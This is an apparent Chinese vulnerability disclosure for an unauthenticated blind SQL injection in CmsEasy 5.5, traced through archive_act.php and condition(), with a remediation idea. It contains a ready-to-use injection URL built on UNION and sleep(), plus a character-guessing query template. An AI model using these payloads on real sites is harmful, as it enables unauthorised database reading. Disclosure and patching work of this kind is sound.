### 简要描述: cmseasy 前台sql盲注(绕过union,sleep等函数,无需登录,无防御)

### 详细说明:

archive_act.php:(line:27-33)

```
}
front::check_type($this->pagesize);
$announcement = new announcement();
$this->view->announcements = $announcement->getrows(null, 10);
$this->view->usergroupid = 1000;
front::check_type(cookie::get('login_username'), 'safe');
front::check_type(cookie::get('login_password'), 'safe');
$this->view->showarchive = archive::getInstance()->getrow(front::get('aid'));
$addcontentuser = new user();
$addcontentuser = $addcontentuser->getrow(array('userid' => $this->view->showarchive['userid']));
```

这里有一句:

$this->view->showarchive = archive::getInstance()->getrow(front::get('aid'));

我们跟进去这个函数getrow:

```
function getrow($condition,$order='1 desc',$cols='*') {
    $this->condition($condition);
    return $this->rec_select_one($condition,'*',$order);
}
```

然后再看看这个函数condition:

```
function condition(&$condition) {
    if (isset($condition) &&is_array($condition)) {
        $_condition=array();
        foreach ($condition as $key=>$value) {
            //$value=str_replace("'","\'",$value);
            $_condition[]="`$key`='$value'";
        }
        $condition=implode(' and ',$_condition);
    } else if (is_numeric($condition)) {
        $this->getFields();
        $condition="`$this->primary_key`='$condition'";
    }else if(true === $condition){
```

这里可以看到：当 $condition 是数组时，数组的键名 $key 被直接拼进反引号内作为列名，没有做任何过滤（对 $value 做转义的那一行也被注释掉了）。由于 aid 参数可以以数组形式传入并原样交给 getrow()，攻击者可控的键名能够闭合反引号并在其后拼接任意 SQL。修复思路：在 condition() 中把数组键名与 getFields() 得到的表字段列表做白名单校验，拒绝不在字段列表中的键；值则应使用参数化查询或数据库层转义，而不是直接拼接。

我们发送请求:

url:http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818_new/uploads/index.php?case=archive&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,if(1,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%23]=1

在后台抓取日志可以看到，最终执行的 SQL 语句为:

SELECT * FROM `cmseasy_archive` WHERE `typeid`=1 UNION SELECT/**/1,2,3,if(1,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58#`='1' and (state IS NULL or state<>'-1') ORDER BY 1 desc limit 1
该语句被完整执行，页面响应延迟了5秒，说明时间盲注成立。接下来猜解字段内容所用的语句形式如下:

SELECT * FROM `cmseasy_archive` WHERE `typeid`=1 UNION SELECT/**/1,2,3,if(ascii(substr(user(),1,1))=$NUM,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58#`='1' and (state IS NULL or state<>'-1') ORDER BY 1 desc limit 1

通过改变 $NUM 的值即可进行猜解（payload 需先进行 urlencode），其余步骤不再赘述。

### 漏洞证明: